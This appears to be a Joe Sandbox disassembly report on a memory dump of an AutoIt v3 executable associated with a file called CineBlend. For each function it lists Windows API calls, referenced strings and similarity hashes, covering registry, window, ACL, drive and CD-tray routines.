AutoIt v3 GUI, xrefs: 00B326B0

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 171d2f78412547a3b5719d44bd0559a0e2b4f70730f89ee457064d50a1120743
Instruction ID: e3c9197867e7d27f686fd8ade58f4bf972fca2321dab347e297758307fd31505
Opcode Fuzzy Hash: 171d2f78412547a3b5719d44bd0559a0e2b4f70730f89ee457064d50a1120743
Instruction Fuzzy Hash: A1B16D356002099FDB14DFA8CC89FAE7BF4FB48714F118269FA1AA7290DB74E940DB51

Function 00B916D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B91A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B91A60
Part of subcall function 00B91A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B914E7,?,?,?), ref: 00B91A6C
Part of subcall function 00B91A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B914E7,?,?,?), ref: 00B91A7B
Part of subcall function 00B91A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B914E7,?,?,?), ref: 00B91A82
Part of subcall function 00B91A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B91A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B91741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B91775
GetLengthSid.ADVAPI32(?), ref: 00B9178C
GetAce.ADVAPI32(?,00000000,?), ref: 00B917C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B917E2
GetLengthSid.ADVAPI32(?), ref: 00B917F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B91801
HeapAlloc.KERNEL32(00000000), ref: 00B91808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B91829
CopySid.ADVAPI32(00000000), ref: 00B91830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B9185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B91881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B91893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B918BA
HeapFree.KERNEL32(00000000), ref: 00B918C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B918CA
HeapFree.KERNEL32(00000000), ref: 00B918D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B918DA
HeapFree.KERNEL32(00000000), ref: 00B918E1
GetProcessHeap.KERNEL32(00000000,?), ref: 00B918ED
HeapFree.KERNEL32(00000000), ref: 00B918F4

Part of subcall function 00B91ADF: GetProcessHeap.KERNEL32(00000008,00B914FD,?,00000000,?,00B914FD,?), ref: 00B91AED
Part of subcall function 00B91ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B914FD,?), ref: 00B91AF4
Part of subcall function 00B91ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B914FD,?), ref: 00B91B03

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 7f9e49c89ea0b587481d5ab2aca6886cf8147ef0eebcf7e4f733592fadedaf0a
Instruction ID: 8f40f1810e224201bbe94c28da6b406be0fffe083cd2aba10ed4ca1aff45ff31
Opcode Fuzzy Hash: 7f9e49c89ea0b587481d5ab2aca6886cf8147ef0eebcf7e4f733592fadedaf0a
Instruction Fuzzy Hash: 8E714CB6D0120AABDF10DFA9DC84FAEBBB8FF08310F154675E915A7190DB319A05DB60

Function 00BBCE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BBCF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,00BCDCD0,00000000,?,00000000,?,?), ref: 00BBCFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00BBD004
_wcslen.LIBCMT ref: 00BBD054
_wcslen.LIBCMT ref: 00BBD0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00BBD112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00BBD221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00BBD2AD
RegCloseKey.ADVAPI32(?), ref: 00BBD2E1
RegCloseKey.ADVAPI32(00000000), ref: 00BBD2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00BBD3C0

Strings

REG_DWORD, xrefs: 00BBD264
REG_EXPAND_SZ, xrefs: 00BBD02D
REG_QWORD, xrefs: 00BBD323
REG_MULTI_SZ, xrefs: 00BBD155
REG_SZ, xrefs: 00BBD0A4
REG_BINARY, xrefs: 00BBD373

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 82dadbc0266ac67ca843f65845fd6b4195a25b26eaea50619c60ef3827e3ce2a
Instruction ID: 05023383ccee9542e12702325da9833a7473237f8760778dcf79817bc0948000
Opcode Fuzzy Hash: 82dadbc0266ac67ca843f65845fd6b4195a25b26eaea50619c60ef3827e3ce2a
Instruction Fuzzy Hash: 781276756042019FCB14DF14C881B6ABBF5EF88714F14889CF89A9B3A2DB75ED45CB82

Function 00BC13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00BC1462
_wcslen.LIBCMT ref: 00BC149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BC14F0
_wcslen.LIBCMT ref: 00BC1526
_wcslen.LIBCMT ref: 00BC15A2
_wcslen.LIBCMT ref: 00BC161D

Part of subcall function 00B4FD52: _wcslen.LIBCMT ref: 00B4FD5D

Part of subcall function 00B93535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B93547

Strings

GETSELECTED, xrefs: 00BC16EA
GETTOTALCOUNT, xrefs: 00BC148E, 00BC14B3
SELECT, xrefs: 00BC17AD
UNCHECK, xrefs: 00BC17DA
COLLAPSE, xrefs: 00BC159D, 00BC15B8
EXISTS, xrefs: 00BC1618, 00BC1633
EXPAND, xrefs: 00BC1694
ISCHECKED, xrefs: 00BC177D
GETTEXT, xrefs: 00BC1733
CHECK, xrefs: 00BC1521, 00BC153C
GETITEMCOUNT, xrefs: 00BC16BA

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 21adb56063c0315f8f3d12a29e05268c8de97e6750f4e31292a0881586c1ebcb
Instruction ID: 973a356b0b6c370eed94ce423a0583accd47c8f42fe7eec1cd62b4e23b5c558e
Opcode Fuzzy Hash: 21adb56063c0315f8f3d12a29e05268c8de97e6750f4e31292a0881586c1ebcb
Instruction Fuzzy Hash: 32E15C756083018FCB14DF28C451A6AB7E1FF95314B1489EDF896AB3A2DB30ED45CB91

Function 00BBD3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BBC10E,?,?), ref: 00BBD415
_wcslen.LIBCMT ref: 00BBD451
_wcslen.LIBCMT ref: 00BBD4C8
_wcslen.LIBCMT ref: 00BBD4FE
_wcslen.LIBCMT ref: 00BBD559
_wcslen.LIBCMT ref: 00BBD58F
_wcslen.LIBCMT ref: 00BBD5DF

Strings

HKLM, xrefs: 00BBD4F8, 00BBD4FD
HKEY_CURRENT_CONFIG, xrefs: 00BBD5D9, 00BBD5DE
HKU, xrefs: 00BBD650
HKCR, xrefs: 00BBD589, 00BBD58E
HKCU, xrefs: 00BBD62E
HKEY_LOCAL_MACHINE, xrefs: 00BBD4C2, 00BBD4C7
HKCC, xrefs: 00BBD60C
HKEY_CLASSES_ROOT, xrefs: 00BBD553, 00BBD558
HKEY_USERS, xrefs: 00BBD63F
HKEY_CURRENT_USER, xrefs: 00BBD61D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: f343802d45481218db41abd67eea7e8cfe7c1d3d242d9080a7bbe19b2cb5de8c
Instruction ID: 5db768f80c53846ee0a29f8192c0296462f92bc94f0348c903b81629e987ae4b
Opcode Fuzzy Hash: f343802d45481218db41abd67eea7e8cfe7c1d3d242d9080a7bbe19b2cb5de8c
Instruction Fuzzy Hash: 7571C43360052A8BCB209E78C9416FF33E1EB71758B2501E4EC569B294FBB9DD49C7A0

Function 00BC8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BC8DB5
_wcslen.LIBCMT ref: 00BC8DC9
_wcslen.LIBCMT ref: 00BC8DEC
_wcslen.LIBCMT ref: 00BC8E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BC8E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BC6691), ref: 00BC8EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BC8EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BC8F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BC8F5C
FreeLibrary.KERNEL32(?), ref: 00BC8F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BC8F78
DestroyIcon.USER32(?,?,?,?,?,00BC6691), ref: 00BC8F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BC8FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BC8FB0

Strings

.dll, xrefs: 00BC8E06
.exe, xrefs: 00BC8DE3
.icl, xrefs: 00BC8DC3

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 12acc555201b2811c8c2d380bf4d99f02eb16b2595c3ac4fed83c4c4ac35f955
Instruction ID: 6b036ba9a3b1178bd3e5161d20b15885c2b4baa7db437602dc39b355a48feadc
Opcode Fuzzy Hash: 12acc555201b2811c8c2d380bf4d99f02eb16b2595c3ac4fed83c4c4ac35f955
Instruction Fuzzy Hash: 0B61CE71A00219BAEB14DF64CC41FBEB7E8EF08B11F10459AF915E61D1DF74A994CBA0

Function 00BA48BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00BA493D
_wcslen.LIBCMT ref: 00BA4948
_wcslen.LIBCMT ref: 00BA499F
_wcslen.LIBCMT ref: 00BA49DD
GetDriveTypeW.KERNEL32(?), ref: 00BA4A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BA4A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BA4A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BA4ACC

Strings

open, xrefs: 00BA4999, 00BA499E
set cd door , xrefs: 00BA4A6D
wait, xrefs: 00BA4A89
open , xrefs: 00BA4A2A
close, xrefs: 00BA4943, 00BA495D
close cd wait, xrefs: 00BA4AB7
closed, xrefs: 00BA494D, 00BA4972, 00BA498B, 00BA49C3, 00BA49DC
type cdaudio alias cd wait, xrefs: 00BA4A46

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: ec6f1203643cbe4a6790c17ca9726c156ee591cff91ddd1157398a09d5c65c2f
Instruction ID: c6a2ae191ea98093df3247e07d3c8242dd85ea128663a8ac0158be854e55f3c0
Opcode Fuzzy Hash: ec6f1203643cbe4a6790c17ca9726c156ee591cff91ddd1157398a09d5c65c2f
Instruction Fuzzy Hash: 847100726083059FC310EF28C88197BB7E4EFA9758F1049ADF89697261EB70DD49CB91

Function 00B96382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00B96395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B963A7
SetWindowTextW.USER32(?,?), ref: 00B963BE
GetDlgItem.USER32(?,000003EA), ref: 00B963D3
SetWindowTextW.USER32(00000000,?), ref: 00B963D9
GetDlgItem.USER32(?,000003E9), ref: 00B963E9
SetWindowTextW.USER32(00000000,?), ref: 00B963EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B96410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B9642A
GetWindowRect.USER32(?,?), ref: 00B96433
_wcslen.LIBCMT ref: 00B9649A
SetWindowTextW.USER32(?,?), ref: 00B964D6
GetDesktopWindow.USER32 ref: 00B964DC
GetWindowRect.USER32(00000000), ref: 00B964E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00B9653A
GetClientRect.USER32(?,?), ref: 00B96547
PostMessageW.USER32(?,00000005,00000000,?), ref: 00B9656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B96596

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: ad6c4c7b966676d6a6f893d0acb4c4d575de7efefb2d00083a66ca9d56475c60
Instruction ID: ef11babc5d99a260c8c7bbf40d458300e471d91e860eda1891fb8257ad47bfdf
Opcode Fuzzy Hash: ad6c4c7b966676d6a6f893d0acb4c4d575de7efefb2d00083a66ca9d56475c60
Instruction Fuzzy Hash: 2B713C31900609AFDB20DFA8CE85AAEBBF5FF48704F104569E586A36A0DB75E944CB50

Function 00BB086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00BB0884
LoadCursorW.USER32(00000000,00007F8A), ref: 00BB088F
LoadCursorW.USER32(00000000,00007F00), ref: 00BB089A
LoadCursorW.USER32(00000000,00007F03), ref: 00BB08A5
LoadCursorW.USER32(00000000,00007F8B), ref: 00BB08B0
LoadCursorW.USER32(00000000,00007F01), ref: 00BB08BB
LoadCursorW.USER32(00000000,00007F81), ref: 00BB08C6
LoadCursorW.USER32(00000000,00007F88), ref: 00BB08D1
LoadCursorW.USER32(00000000,00007F80), ref: 00BB08DC
LoadCursorW.USER32(00000000,00007F86), ref: 00BB08E7
LoadCursorW.USER32(00000000,00007F83), ref: 00BB08F2
LoadCursorW.USER32(00000000,00007F85), ref: 00BB08FD
LoadCursorW.USER32(00000000,00007F82), ref: 00BB0908
LoadCursorW.USER32(00000000,00007F84), ref: 00BB0913
LoadCursorW.USER32(00000000,00007F04), ref: 00BB091E
LoadCursorW.USER32(00000000,00007F02), ref: 00BB0929
GetCursorInfo.USER32(?), ref: 00BB0939
GetLastError.KERNEL32 ref: 00BB097B

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 7a76a2d4fc1afa10f0300d6f02d8ac281cb6311800906202bf0cff9e8a9351e9
Instruction ID: 80f461d392e7a91e8f409fec0e4b3d63464263b7551ffa02b945a00e47673dd2
Opcode Fuzzy Hash: 7a76a2d4fc1afa10f0300d6f02d8ac281cb6311800906202bf0cff9e8a9351e9
Instruction Fuzzy Hash: 7D4152B0D083196BDB109FBA8C89C6EBFE8FF04754B50456AE15CE7291DA78D801CF91

Function 00B50436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00B50436

Part of subcall function 00B5045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00C0170C,00000FA0,63BEDCC7,?,?,?,?,00B72733,000000FF), ref: 00B5048C
Part of subcall function 00B5045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00B72733,000000FF), ref: 00B50497
Part of subcall function 00B5045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00B72733,000000FF), ref: 00B504A8
Part of subcall function 00B5045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00B504BE
Part of subcall function 00B5045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B504CC
Part of subcall function 00B5045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B504DA
Part of subcall function 00B5045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B50505
Part of subcall function 00B5045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B50510

___scrt_fastfail.LIBCMT ref: 00B50457

Part of subcall function 00B50413: __onexit.LIBCMT ref: 00B50419

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B50492
kernel32.dll, xrefs: 00B504A3
InitializeConditionVariable, xrefs: 00B504B8
SleepConditionVariableCS, xrefs: 00B504C4
WakeAllConditionVariable, xrefs: 00B504D2

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 322078a181aec5dc996321bb16f66fdcbfc0d1e6122799b59d49a13ca71f20f5
Instruction ID: 36109c6ecf8d2b86aeee1f2e00c16e60c9dafd4338ace0fd4c3633f660a6b141
Opcode Fuzzy Hash: 322078a181aec5dc996321bb16f66fdcbfc0d1e6122799b59d49a13ca71f20f5
Instruction Fuzzy Hash: 6221D436A647056BD7213BA8AC46F69B7E4EF08B62F0401F6FD05A3390EF709C048A55

Function 00B93A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B93AD9
_wcslen.LIBCMT ref: 00B93B44

Strings

TEXT, xrefs: 00B93DC8
NAME, xrefs: 00B93C81, 00B93C92
REGEXPCLASS, xrefs: 00B93BA1, 00B93BB2
CLASSNN, xrefs: 00B93B3F, 00B93B50
CLASS, xrefs: 00B93AD4, 00B93AF1
INSTANCE, xrefs: 00B93D9F

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: a180a0d9c97474288f09b2e77cf733d07e09ee92b7ed8daaa8350db585c6550e
Instruction ID: 3bb92695147a84b3518c4d709f559e50a0dd58b9a2f37fa997c271910560e6a3
Opcode Fuzzy Hash: a180a0d9c97474288f09b2e77cf733d07e09ee92b7ed8daaa8350db585c6550e
Instruction Fuzzy Hash: B3E1A132A00A16ABCF149FA4C4917EDBBF4FF54B10F1441B9E956E7250DB309E8997A0

Function 00BA4F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00BCDCD0), ref: 00BA4F6C
_wcslen.LIBCMT ref: 00BA4F80
_wcslen.LIBCMT ref: 00BA4FDE
_wcslen.LIBCMT ref: 00BA5039
_wcslen.LIBCMT ref: 00BA5084
_wcslen.LIBCMT ref: 00BA50EC

Part of subcall function 00B4FD52: _wcslen.LIBCMT ref: 00B4FD5D

GetDriveTypeW.KERNEL32(?,00BF7C10,00000061), ref: 00BA5188

Strings

removable, xrefs: 00BA502F, 00BA5034
network, xrefs: 00BA50E2, 00BA50E7
all, xrefs: 00BA4F76, 00BA4F7B
unknown, xrefs: 00BA514D
cdrom, xrefs: 00BA4FD4, 00BA4FD9
fixed, xrefs: 00BA507A, 00BA507F
ramdisk, xrefs: 00BA5136

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: a2cc86bd3f2da638105c71b1afd3d426c48386576b7c4778e66262b7b2106f1c
